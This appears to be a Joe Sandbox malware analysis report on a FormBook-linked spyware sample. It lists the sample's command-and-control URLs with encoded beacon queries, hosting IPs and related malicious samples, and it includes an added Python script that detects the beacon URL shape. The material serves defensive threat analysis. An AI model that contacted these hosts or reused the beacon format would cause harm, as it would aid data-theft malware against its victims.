http://www.2bhp.com/a4ar/?n0=mTk8u4lhzbnhVh&PR_xXrA=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ= | 0% | Avira URL Cloud | safe
http://www.asiapartnars.online/kt2f/?PR_xXrA=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&n0=mTk8u4lhzbnhVh | 0% | Avira URL Cloud | safe
http://www.63582.photo/5o7d/?PR_xXrA=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGduAov/pmUDz/4soHslE7c+cNQZpL9+8t0WKA=&n0=mTk8u4lhzbnhVh | 0% | Avira URL Cloud | safe
https://www.gandi.net/en/domain | 0% | Avira URL Cloud | safe
http://www.linkwave.cloud/al6z/?n0=mTk8u4lhzbnhVh&PR_xXrA=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw= | 0% | Avira URL Cloud | safe
http://www.b5x7vk.agency/zznj/ | 0% | Avira URL Cloud | safe
https://whois.gandi.net/en/results?search=ultraleap.net | 0% | Avira URL Cloud | safe
http://www.b5x7vk.agency/zznj/?n0=mTk8u4lhzbnhVh&PR_xXrA=XN/afWzprYUm2zEh/Me8v7IO6BZfJ8ldqsTKqfvYzDGyGH3Qqe2ibLEK4zu3d4hkDWgHsBH7o/PgLSUsZsuwL2SV1lDf+BUf6ZfDIcx/0TWTXhhDzyKZrRs= | 0% | Avira URL Cloud | safe
http://www.mfgarage.net/3lu7/ | 0% | Avira URL Cloud | safe
http://www.b5x7vk.agency | 0% | Avira URL Cloud | safe
http://www.asiapartnars.online/kt2f/ | 0% | Avira URL Cloud | safe
http://www.ultraleap.net/8pln/ | 0% | Avira URL Cloud | safe
http://www.dalong.site/v2c3/?n0=mTk8u4lhzbnhVh&PR_xXrA=4KW7rJi8xQgG5Juif0zvrQruwxJNCZQzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxev+uUFboPihN5w7Wu/KeDCgTl/GYzmTNxclA= | 0% | Avira URL Cloud | safe
http://www.heldhold.xyz/fava/ | 0% | Avira URL Cloud | safe
http://www.63582.photo/5o7d/ | 0% | Avira URL Cloud | safe
https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2F3lu7%2F%3FPR_xXrA%3Dn | 0% | Avira URL Cloud | safe
http://www.mgeducacaopro.online/xamn/ | 0% | Avira URL Cloud | safe
http://www.heldhold.xyz/fava/?PR_xXrA=GCDZpLqdSYk7fT5CRgwCB4qcStchn8AdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQCgtKpqiTYCqf8kUZvClY0WdZB6RiKYyZbbU=&n0=mTk8u4lhzbnhVh | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
webredir.vip.gandi.net | 217.70.184.50 | true | true | | unknown
azkwupgf.as66588.com | 103.248.137.209 | true | true | | unknown
dalong.site | 172.96.187.60 | true | true | | unknown
www.b5x7vk.agency | 104.21.11.31 | true | true | | unknown
www.heldhold.xyz | 67.223.117.189 | true | true | | unknown
www.2bhp.com | 81.88.63.46 | true | true | | unknown
linkwave.cloud | 3.33.130.190 | true | true | | unknown
asiapartnars.online | 3.33.130.190 | true | true | | unknown
mgeducacaopro.online | 3.33.130.190 | true | true | | unknown
www.mfgarage.net | 85.153.138.113 | true | true | | unknown
www.dalong.site | unknown | unknown | true | | unknown
www.useanecdotenow.tech | unknown | unknown | true | | unknown
www.ultraleap.net | unknown | unknown | true | | unknown
www.linkwave.cloud | unknown | unknown | true | | unknown
www.mgeducacaopro.online | unknown | unknown | true | | unknown
www.63582.photo | unknown | unknown | true | | unknown
www.asiapartnars.online | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.linkwave.cloud/al6z/ | true | Avira URL Cloud: safe | unknown
http://www.asiapartnars.online/kt2f/?PR_xXrA=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&n0=mTk8u4lhzbnhVh | true | Avira URL Cloud: safe | unknown
http://www.63582.photo/5o7d/?PR_xXrA=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGduAov/pmUDz/4soHslE7c+cNQZpL9+8t0WKA=&n0=mTk8u4lhzbnhVh | true | Avira URL Cloud: safe | unknown
http://www.b5x7vk.agency/zznj/ | true | Avira URL Cloud: safe | unknown
http://www.2bhp.com/a4ar/?n0=mTk8u4lhzbnhVh&PR_xXrA=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ= | true | Avira URL Cloud: safe | unknown
http://www.dalong.site/v2c3/ | true | Avira URL Cloud: safe | unknown
http://www.ultraleap.net/8pln/?PR_xXrA=T9/DtY4QstE2hf5O1waUB+I/eJ4Uv9cvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9oL792aB/FoBSyK+aeSTPR1nXcfMqNX8wInY=&n0=mTk8u4lhzbnhVh | true | Avira URL Cloud: safe | unknown
http://www.linkwave.cloud/al6z/?n0=mTk8u4lhzbnhVh&PR_xXrA=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw= | true | Avira URL Cloud: safe | unknown
http://www.asiapartnars.online/kt2f/ | true | Avira URL Cloud: safe | unknown
http://www.mfgarage.net/3lu7/ | true | Avira URL Cloud: safe | unknown
http://www.63582.photo/5o7d/ | true | Avira URL Cloud: safe | unknown
http://www.dalong.site/v2c3/?n0=mTk8u4lhzbnhVh&PR_xXrA=4KW7rJi8xQgG5Juif0zvrQruwxJNCZQzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxev+uUFboPihN5w7Wu/KeDCgTl/GYzmTNxclA= | true | Avira URL Cloud: safe | unknown
http://www.b5x7vk.agency/zznj/?n0=mTk8u4lhzbnhVh&PR_xXrA=XN/afWzprYUm2zEh/Me8v7IO6BZfJ8ldqsTKqfvYzDGyGH3Qqe2ibLEK4zu3d4hkDWgHsBH7o/PgLSUsZsuwL2SV1lDf+BUf6ZfDIcx/0TWTXhhDzyKZrRs= | true | Avira URL Cloud: safe | unknown
http://www.ultraleap.net/8pln/ | true | Avira URL Cloud: safe | unknown
http://www.heldhold.xyz/fava/ | true | Avira URL Cloud: safe | unknown
http://www.mgeducacaopro.online/xamn/ | true | Avira URL Cloud: safe | unknown
http://www.heldhold.xyz/fava/?PR_xXrA=GCDZpLqdSYk7fT5CRgwCB4qcStchn8AdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQCgtKpqiTYCqf8kUZvClY0WdZB6RiKYyZbbU=&n0=mTk8u4lhzbnhVh | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://whois.gandi.net/en/results?search=ultraleap.net | mstsc.exe, 00000003.00000002.3548096253.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.3549606840.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000002.3547618180.00000000033A6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.gandi.net/en/domain | mstsc.exe, 00000003.00000002.3548096253.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.3549606840.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000002.3547618180.00000000033A6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.b5x7vk.agency | FrywuFHvnDbLo.exe, 00000005.00000002.3548998319.00000000052C5000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2F3lu7%2F%3FPR_xXrA%3Dn | mstsc.exe, 00000003.00000002.3548096253.0000000005D46000.00000004.10000000.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000002.3547618180.0000000004036000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
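
The URLs the analysis marks malicious above share one shape: a four-character directory on plain HTTP, either bare or followed by a query of exactly two parameters, PR_xXrA carrying a base64-alphabet blob and n0 carrying the same 14-character token on every host. The URLs marked non-malicious (search-engine defaults and favicon strings that mstsc.exe read out of browser profile data, plus whois and login pages) do not fit it. The block below is an added example, not part of the report or of any FormBook tooling: it copies the report's URL list in as constructed input, parses that shape without percent- or plus-decoding (the blob contains '+'), rejects the benign URLs, and groups the hosts by the n0 token they share. Reading n0 as a client identifier and treating the shape as a beacon are assumptions drawn from this report's URLs alone; the blob is not decoded and nothing is claimed about its contents.

```python
"""Structural matching of the HTTP beacon URLs listed in this report.

Added example; the constructed input below copies the report's malicious URL
list plus a few of the benign browser URLs the report attributes to mstsc.exe
memory. The shape rule, and the reading of n0 as a client identifier, are
assumptions drawn from these URLs only.
"""
import re
from urllib.parse import urlsplit

REPORT_URLS = [  # constructed input, copied from the report's malicious URL table
    "http://www.linkwave.cloud/al6z/",
    "http://www.asiapartnars.online/kt2f/?PR_xXrA=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&n0=mTk8u4lhzbnhVh",
    "http://www.63582.photo/5o7d/?PR_xXrA=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGduAov/pmUDz/4soHslE7c+cNQZpL9+8t0WKA=&n0=mTk8u4lhzbnhVh",
    "http://www.b5x7vk.agency/zznj/",
    "http://www.2bhp.com/a4ar/?n0=mTk8u4lhzbnhVh&PR_xXrA=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ=",
    "http://www.dalong.site/v2c3/",
    "http://www.ultraleap.net/8pln/?PR_xXrA=T9/DtY4QstE2hf5O1waUB+I/eJ4Uv9cvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9oL792aB/FoBSyK+aeSTPR1nXcfMqNX8wInY=&n0=mTk8u4lhzbnhVh",
    "http://www.linkwave.cloud/al6z/?n0=mTk8u4lhzbnhVh&PR_xXrA=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw=",
    "http://www.asiapartnars.online/kt2f/",
    "http://www.mfgarage.net/3lu7/",
    "http://www.63582.photo/5o7d/",
    "http://www.dalong.site/v2c3/?n0=mTk8u4lhzbnhVh&PR_xXrA=4KW7rJi8xQgG5Juif0zvrQruwxJNCZQzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxev+uUFboPihN5w7Wu/KeDCgTl/GYzmTNxclA=",
    "http://www.b5x7vk.agency/zznj/?n0=mTk8u4lhzbnhVh&PR_xXrA=XN/afWzprYUm2zEh/Me8v7IO6BZfJ8ldqsTKqfvYzDGyGH3Qqe2ibLEK4zu3d4hkDWgHsBH7o/PgLSUsZsuwL2SV1lDf+BUf6ZfDIcx/0TWTXhhDzyKZrRs=",
    "http://www.ultraleap.net/8pln/",
    "http://www.heldhold.xyz/fava/",
    "http://www.mgeducacaopro.online/xamn/",
    "http://www.heldhold.xyz/fava/?PR_xXrA=GCDZpLqdSYk7fT5CRgwCB4qcStchn8AdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQCgtKpqiTYCqf8kUZvClY0WdZB6RiKYyZbbU=&n0=mTk8u4lhzbnhVh",
]
BENIGN_URLS = [  # constructed input, a subset of the report's non-malicious URLs
    "https://duckduckgo.com/chrome_newtab",
    "https://duckduckgo.com/ac/?q=",
    "https://ac.ecosia.org/autocomplete?q=",
    "https://www.gandi.net/en/domain",
    "http://www.b5x7vk.agency",
]

PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")        # one short directory and nothing else
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")  # base64 alphabet with optional padding
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{14}$")      # the n0 value seen on every host


def split_query(query):
    """Split a raw query string without percent- or plus-decoding (the blob uses '+')."""
    params = {}
    for part in filter(None, query.split("&")):
        key, _, value = part.partition("=")
        params[key] = value
    return params


def parse_beacon(url):
    """Return the beacon's parts if url has the report's shape, otherwise None."""
    u = urlsplit(url)
    if u.scheme != "http" or not PATH_RE.match(u.path):
        return None
    if not u.query:  # bare directory probe, as also listed in the report
        return {"host": u.hostname, "path": u.path, "blob": None, "client_id": None}
    p = split_query(u.query)
    if set(p) != {"PR_xXrA", "n0"}:
        return None
    if not BLOB_RE.match(p["PR_xXrA"]) or not TOKEN_RE.match(p["n0"]):
        return None
    return {"host": u.hostname, "path": u.path, "blob": p["PR_xXrA"], "client_id": p["n0"]}


def summarize(urls):
    """Classify urls and group the matching hosts by the n0 token they carry."""
    hosts, client_ids, rejected = {}, {}, []
    for url in urls:
        b = parse_beacon(url)
        if b is None:
            rejected.append(url)
            continue
        hosts[b["host"]] = b["path"]
        if b["client_id"]:
            client_ids.setdefault(b["client_id"], set()).add(b["host"])
    return {"matched": len(urls) - len(rejected), "rejected": rejected,
            "hosts": hosts, "client_ids": {k: sorted(v) for k, v in client_ids.items()}}


if __name__ == "__main__":
    result = summarize(REPORT_URLS + BENIGN_URLS)
    print(f"{result['matched']} beacon-shaped URLs on {len(result['hosts'])} hosts")
    for token, hs in result["client_ids"].items():
        print(f"n0={token} shared by {len(hs)} hosts: {', '.join(hs)}")
```

On this input every report URL matches (17 URLs across 10 hosts, each host with its own directory), all five benign URLs are rejected, and a single n0 token ties eight of the hosts together. Matching on shape rather than on the host list is what makes the rule survive the next domain rotation; the host list is what goes into the blocklist.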
IP | Domain | Country | ASN | ASN Name | Malicious
67.223.117.189 | www.heldhold.xyz | United States | 15189 | VIMRO-AS15189US | true
172.96.187.60 | dalong.site | Canada | 32475 | SINGLEHOP-LLCUS | true
103.248.137.209 | azkwupgf.as66588.com | Hong Kong | 59371 | DNC-ASDimensionNetworkCommunicationLimitedHK | true
217.70.184.50 | webredir.vip.gandi.net | France | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | true
81.88.63.46 | www.2bhp.com | Italy | 39729 | REGISTER-ASIT | true
104.21.11.31 | www.b5x7vk.agency | United States | 13335 | CLOUDFLARENETUS | true
3.33.130.190 | linkwave.cloud | United States | 8987 | AMAZONEXPANSIONGB | true
85.153.138.113 | www.mfgarage.net | Turkey | 12946 | TELECABLESpainES | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1518123
Start date and time: 2024-09-25 12:45:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: rP0n___87004354.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/4@11/8
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 55
• Number of non-executed functions: 279
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: rP0n___87004354.exe
Time | Type | Description
06:46:52 | API Interceptor | 8728961x Sleep call for process: mstsc.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
67.223.117.189 | Enquiry.exe | Get hash | malicious | FormBook | Browse | www.uburn.xyz/iqqs/
67.223.117.189 | AWB_5771388044 Documenti di spedizione.exe | Get hash | malicious | FormBook | Browse | www.uburn.xyz/unks/
67.223.117.189 | ncOLm62YLB.exe | Get hash | malicious | FormBook | Browse | www.uburn.xyz/unks/
67.223.117.189 | DOC092024-0431202229487.exe | Get hash | malicious | FormBook | Browse | www.heldhold.xyz/fava/
67.223.117.189 | LisectAVT_2403002B_466.exe | Get hash | malicious | FormBook | Browse | www.techstone.top/d5fo/
67.223.117.189 | Shipping Documents 7896424100.exe | Get hash | malicious | FormBook | Browse | www.nodedev.top/wnsq/
67.223.117.189 | ORDEN_240715189833.IMG | Get hash | malicious | DarkTortilla, FormBook | Browse | www.akissdove.xyz/8ntn/
67.223.117.189 | OrderPI.exe | Get hash | malicious | FormBook | Browse | www.helidove.xyz/no40/
67.223.117.189 | PRE-ALERT HTHC22031529.exe | Get hash | malicious | FormBook | Browse | www.nodedev.top/wnsq/
67.223.117.189 | Scan405.exe | Get hash | malicious | FormBook | Browse | www.bandbid.top/38gc/
172.96.187.60 | DOC092024-0431202229487.exe | Get hash | malicious | FormBook | Browse | www.dalong.site/v2c3/
172.96.187.60 | xU0wdBC6XWRZ6UY.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.resmierabaru20.shop/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=3z9oRqqmd6FbtNg9CkHjvIkeoG86+7PKpZbS0bbY4gI7z8JQO6bI5gwIdi8ZdM48HBzoDxHL8Q==
217.70.184.50 | CYTAT.exe | Get hash | malicious | FormBook | Browse | www.languagemodel.pro/nxfn/
217.70.184.50 | Cotizaci#U00f3n.exe | Get hash | malicious | FormBook | Browse | www.languagemodel.pro/nxfn/
217.70.184.50 | ES-241-29335_pdf.exe | Get hash | malicious | FormBook | Browse | www.offkase.org/vkr8/
217.70.184.50 | RECIEPT.PDF.exe | Get hash | malicious | FormBook | Browse | www.ultraleap.net/hwgh/
217.70.184.50 | PO# Q919240.exe | Get hash | malicious | FormBook | Browse | www.languagemodel.pro/nxfn/
217.70.184.50 | PO098765678.exe | Get hash | malicious | FormBook | Browse | www.ultraleap.net/4qqr/
217.70.184.50 | PAGO $830.900.exe | Get hash | malicious | FormBook | Browse | www.languagemodel.pro/nxfn/
217.70.184.50 | FATURALAR PDF.exe | Get hash | malicious | FormBook | Browse | www.akravchenko.dev/atph/
217.70.184.50 | Order#Qxz091124.exe | Get hash | malicious | FormBook | Browse | www.akravchenko.dev/qeip/
217.70.184.50 | DOC092024-0431202229487.exe | Get hash | malicious | FormBook | Browse | www.ultraleap.net/8pln/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
www.heldhold.xyz | DOC092024-0431202229487.exe | Get hash | malicious | FormBook | Browse | 67.223.117.189
webredir.vip.gandi.net | CYTAT.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | Cotizaci#U00f3n.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | ES-241-29335_pdf.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | RECIEPT.PDF.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | PO# Q919240.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | PO098765678.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | PAGO $830.900.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | PROFOMA INVOICE SHEET.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | FATURALAR PDF.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
www.2bhp.com | AWB_5771388044 Documenti di spedizione.exe | Get hash | malicious | FormBook | Browse | 81.88.63.46
www.2bhp.com | ncOLm62YLB.exe | Get hash | malicious | FormBook | Browse | 81.88.63.46
www.2bhp.com | DOC092024-0431202229487.exe | Get hash | malicious | FormBook | Browse | 81.88.63.46
azkwupgf.as66588.com | inquiry and prices EO-230807.exe | Get hash | malicious | FormBook | Browse | 147.92.40.175
azkwupgf.as66588.com | HBLAWBP.LISTCOC & INV.exe | Get hash | malicious | FormBook | Browse | 147.92.40.174
azkwupgf.as66588.com | NEW ORDERS scan_29012019.exe | Get hash | malicious | FormBook | Browse | 147.92.40.175
azkwupgf.as66588.com | DOC092024-0431202229487.exe | Get hash | malicious | FormBook | Browse | 147.92.40.175
www.b5x7vk.agency | Payment Advise-PDF.exe | Get hash | malicious | FormBook | Browse | 172.67.165.25
www.b5x7vk.agency | DOC092024-0431202229487.exe | Get hash | malicious | FormBook | Browse | 104.21.11.31
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
SINGLEHOP-LLCUS | http://www.rb.gy/yfdl7y/ | Get hash | malicious | Unknown | Browse | 198.143.164.252
SINGLEHOP-LLCUS | http://www.rb.gy/h66x7g/ | Get hash | malicious | Unknown | Browse | 198.143.164.252
SINGLEHOP-LLCUS | http://www.rb.gy/6ucw3c/ | Get hash | malicious | Unknown | Browse | 198.143.164.252
SINGLEHOP-LLCUS | https://dev-612101459966.pantheonsite.io/ | Get hash | malicious | Unknown | Browse | 198.143.164.252
SINGLEHOP-LLCUS | https://alliancecompositesinc.com/ | Get hash | malicious | Unknown | Browse | 96.127.182.206
SINGLEHOP-LLCUS | Warning_Report_[Limit_Notice].PDF HES0O.html | Get hash | malicious | HTMLPhisher | Browse | 108.178.43.142
SINGLEHOP-LLCUS | Domain_Validation_Protocol_EX-205WQMN.html | Get hash | malicious | HTMLPhisher | Browse | 108.178.43.142
SINGLEHOP-LLCUS | https://bdh.vcj.mybluehost.me/website_8e3e3126/wp-admin/ANTIA/infospage.php/ | Get hash | malicious | Unknown | Browse | 198.143.164.252
SINGLEHOP-LLCUS | https://www.cossuel.sn/css/ | Get hash | malicious | Unknown | Browse | 109.199.108.176
SINGLEHOP-LLCUS | http://scarce-army-wide.on-fleek.app/ | Get hash | malicious | HTMLPhisher | Browse | 108.178.38.98
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | CYTAT.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | Cotizaci#U00f3n.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | ES-241-29335_pdf.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | RECIEPT.PDF.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | PO# Q919240.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | PO098765678.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | PAGO $830.900.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | FATURALAR PDF.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | Order#Qxz091124.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
DNC-ASDimensionNetworkCommunicationLimitedHK | inquiry and prices EO-230807.exe | Get hash | malicious | FormBook | Browse | 147.92.40.175
DNC-ASDimensionNetworkCommunicationLimitedHK | HBLAWBP.LISTCOC & INV.exe | Get hash | malicious | FormBook | Browse | 147.92.40.174
DNC-ASDimensionNetworkCommunicationLimitedHK | NEW ORDERS scan_29012019.exe | Get hash | malicious | FormBook | Browse | 147.92.40.175
DNC-ASDimensionNetworkCommunicationLimitedHK | DOC092024-0431202229487.exe | Get hash | malicious | FormBook | Browse | 147.92.40.175
DNC-ASDimensionNetworkCommunicationLimitedHK | Udspecialiser45.exe | Get hash | malicious | FormBook, GuLoader | Browse | 147.92.36.247
DNC-ASDimensionNetworkCommunicationLimitedHK | http://oveman-austral.com/ | Get hash | malicious | Unknown | Browse | 147.92.44.231
DNC-ASDimensionNetworkCommunicationLimitedHK | PURCHASING ORDER.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 147.92.35.81
DNC-ASDimensionNetworkCommunicationLimitedHK | a82WdwCQnQOQf4b.exe | Get hash | malicious | FormBook | Browse | 147.92.35.81
DNC-ASDimensionNetworkCommunicationLimitedHK | PTT Group project - Quotation.exe | Get hash | malicious | FormBook | Browse | 147.92.36.231
DNC-ASDimensionNetworkCommunicationLimitedHK | RFQ - MK FMHS.RFQ.24.101.exe | Get hash | malicious | FormBook | Browse | 207.148.37.252
VIMRO-AS15189US | Enquiry.exe | Get hash | malicious | FormBook | Browse | 67.223.117.189
VIMRO-AS15189US | AWB_5771388044 Documenti di spedizione.exe | Get hash | malicious | FormBook | Browse | 67.223.117.189
VIMRO-AS15189US | ncOLm62YLB.exe | Get hash | malicious | FormBook | Browse | 67.223.117.189
VIMRO-AS15189US | DOC092024-0431202229487.exe | Get hash | malicious | FormBook | Browse | 67.223.117.189
VIMRO-AS15189US | SecuriteInfo.com.Win32.CrypterX-gen.29913.30159.exe | Get hash | malicious | FormBook | Browse | 67.223.118.13
VIMRO-AS15189US | LisectAVT_2403002B_466.exe | Get hash | malicious | FormBook | Browse | 67.223.117.189
VIMRO-AS15189US | H37012.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 67.223.118.13
VIMRO-AS15189US | file.exe | Get hash | malicious | LummaC, Clipboard Hijacker, LummaC Stealer | Browse | 67.223.119.7
VIMRO-AS15189US | file.exe | Get hash | malicious | LummaC, Clipboard Hijacker, LummaC Stealer | Browse | 67.223.119.7
VIMRO-AS15189US | Shipping Documents 7896424100.exe | Get hash | malicious | FormBook | Browse | 67.223.117.189
